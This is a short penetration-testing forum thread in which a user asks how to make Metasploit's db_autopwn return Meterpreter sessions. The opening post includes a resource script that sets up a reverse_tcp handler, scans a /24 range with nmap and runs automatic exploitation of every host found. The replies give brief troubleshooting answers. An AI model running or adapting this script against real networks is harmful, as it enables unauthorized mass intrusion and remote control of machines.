Results 1 to 4 of 4

Thread: db_autopwn

  1. #1
    Junior Member JF1976's Avatar
    Join Date
    Jan 2010
    Location
    Kings Lynn, Norfolk UK
    Posts
    31

    Default

    hi all, i've been messing with BT3 and metasploit for the last few days and im after some info on changing the shell used within the autopwn feature.

    im trying to include some automated testing, but my understanding is that i need to use the meterpreter payload rather than a standard shell ? can anyone advised or provide some .rc's or .rb's that might be of use.

    thanks.

    load db_sqlite3

    db_create ms_autopwn.db

    use exploit/mulit/handler
    set ExitOnsession false
    setg PAYLOAD windows/meterpreter/reverse_tcp
    setg LHOST MY.IP.ADD
    setg LPORT 8080
    set AutoRunScript /scripts/my.rb

    db_nmap -p 1-500 ip.range/24

    db_autopwn -p -t -e

    my understanding is that the .rc files should be as simple as that?

    but cleary not as this does not work fully, and only returns command shells rather than meterinterface ? so my .rb file is unable to interact with the vuln hosts.

    also when machines are found and shells are started the db_vulns & notes are empty? should this information not be populated like the db_services is ?

    thanks to anyone that might provide some info

  2. #2
    Senior Member
    Join Date
    Feb 2010
    Posts
    146

    Default

    not sure if this will help you, but i know in the earlier releases of BT when using msf you had to destroy the db's before you created them otherwise you would end up reusing the old one, the was a tutorial on here somewhere, search the archives and see if that works
    open source = open minds, human knowledge belongs to the world

  3. #3
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007
    Posts
    908

    Default

    Quote Originally Posted by crweedon View Post
    not sure if this will help you, but i know in the earlier releases of BT when using msf you had to destroy the db's before you created them otherwise you would end up reusing the old one, the was a tutorial on here somewhere, search the archives and see if that works
    That is an automatic function now



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  4. #4

    Default

    db_autopwn only supports reverse shell and bind shell not meterpreter at the moment.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •